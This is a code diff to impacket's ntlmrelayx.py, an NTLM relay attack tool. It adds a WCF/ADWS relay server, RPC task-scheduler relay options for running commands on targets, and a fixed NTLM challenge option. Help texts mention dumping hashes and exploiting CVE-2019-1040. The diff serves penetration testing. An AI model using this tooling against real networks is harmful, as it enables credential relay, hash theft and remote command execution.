@@ -46,7 +46,7 @@ from threading import Thread
 
 from impacket import version
 from impacket.examples import logger
-from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
+from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer
 from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
 from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
 from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
@@ -151,12 +151,14 @@ def start_servers(options, threads):
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
         c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid)
+        c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
         c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
         c.setIPv6(options.ipv6)
         c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
         c.setSMB2Support(options.smb2support)
+        c.setSMBChallenge(options.ntlmchallenge)
         c.setInterfaceIp(options.interface_ip)
         c.setExploitOptions(options.remove_mic, options.remove_target)
         c.setWebDAVOptions(options.serve_image)
@@ -166,6 +168,8 @@ def start_servers(options, threads):
             c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
         elif server is SMBRelayServer:
             c.setListeningPort(options.smb_port)
+        elif server is WCFRelayServer:
+            c.setListeningPort(options.wcf_port)
 
         #If the redirect option is set, configure the HTTP server to redirect targets to SMB
         if server is HTTPRelayServer and options.r is not None:
@@ -184,7 +188,7 @@ def start_servers(options, threads):
 def stop_servers(threads):
     todelete = []
     for thread in threads:
-        if isinstance(thread, RELAY_SERVERS):
+        if isinstance(thread, tuple(RELAY_SERVERS)):
             thread.server.shutdown()
             todelete.append(thread)
     # Now remove threads from the set
@@ -221,12 +225,14 @@ if __name__ == '__main__':
     parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
                   'bind SMB and HTTP servers',default='')
 
-    serversoptions = parser.add_mutually_exclusive_group()
+    serversoptions = parser.add_argument_group()
     serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
     serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
+    serversoptions.add_argument('--no-wcf-server', action='store_true', help='Disables the WCF server')
 
     parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
     parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
+    parser.add_argument('--wcf-port', type=int, help='Port to listen on wcf server', default=9389)  # ADWS
 
     parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection')
     parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
@@ -239,7 +245,10 @@ if __name__ == '__main__':
                                                        'map the result with '
                                                        'https://docs.python.org/3/library/codecs.html#standard-encodings and then execute ntlmrelayx.py '
                                                        'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
-    parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)')
+    parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support')
+    parser.add_argument('-ntlmchallenge', action="store", default=None, help='Specifies the NTLM server challenge used by the '
+                                                                             'SMB Server (16 hex bytes long. eg: 1122334455667788)')
+
     parser.add_argument('-socks', action='store_true', default=False,
                         help='Launch a SOCKS proxy for the connection relayed')
     parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
@@ -250,16 +259,26 @@ if __name__ == '__main__':
     parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
     parser.add_argument('--serve-image', action='store',help='local path of the image that will we returned to clients')
 
+    parser.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
+                        'target system (for SMB and RPC). If not specified for SMB, hashes will be dumped (secretsdump.py must be'
+                        ' in the same directory). For RPC no output will be provided.')
+
     #SMB arguments
     smboptions = parser.add_argument_group("SMB client options")
 
     smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
                                      'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
-    smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
-                        'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
-                                                          'directory).')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
 
+    #RPC arguments
+    rpcoptions = parser.add_argument_group("RPC client options")
+    rpcoptions.add_argument('-rpc-mode', choices=["TSCH"], default="TSCH", help='Protocol to attack, only TSCH supported')
+    rpcoptions.add_argument('-rpc-use-smb', action='store_true', required=False, help='Relay DCE/RPC to SMB pipes')
+    rpcoptions.add_argument('-auth-smb', action='store', required=False, default='', metavar='[domain/]username[:password]',
+        help='Use this credential to authenticate to SMB (low-privilege account)')
+    rpcoptions.add_argument('-hashes-smb', action='store', required=False, metavar="LMHASH:NTHASH")
+    rpcoptions.add_argument('-rpc-smb-port', type=int, choices=[139, 445], default=445, help='Destination port to connect to SMB')
+
     #MSSQL arguments
     mssqloptions = parser.add_argument_group("MSSQL client options")
     mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
@@ -305,6 +324,10 @@ if __name__ == '__main__':
        logging.error(str(e))
        sys.exit(1)
 
+    if options.rpc_use_smb and not options.auth_smb:
+       logging.error("Set -auth-smb to relay DCE/RPC to SMB pipes")
+       sys.exit(1)
+
     # Init the example's logger theme
     logger.init(options.ts)
 
@@ -351,6 +374,8 @@ if __name__ == '__main__':
         if options.r is not None:
             logging.info("Running HTTP server in redirect mode")
 
+    if not options.no_wcf_server:
+        RELAY_SERVERS.append(WCFRelayServer)
 
     if targetSystem is not None and options.w:
         watchthread = TargetsFileWatcher(targetSystem)
